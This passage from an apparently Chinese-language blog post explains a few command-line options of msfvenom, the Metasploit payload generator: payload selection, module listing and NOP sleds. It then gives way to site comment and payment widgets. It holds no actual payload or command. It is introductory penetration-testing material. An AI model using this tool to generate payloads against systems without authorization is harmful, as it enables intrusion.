--help-formats List available formats

这里我们对msfvenom的参数一一解释

-p —payload 利用哪个payload来生成

-l —list 列出模块类型: payloads,encoders,nops,all

-n —nopsled

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值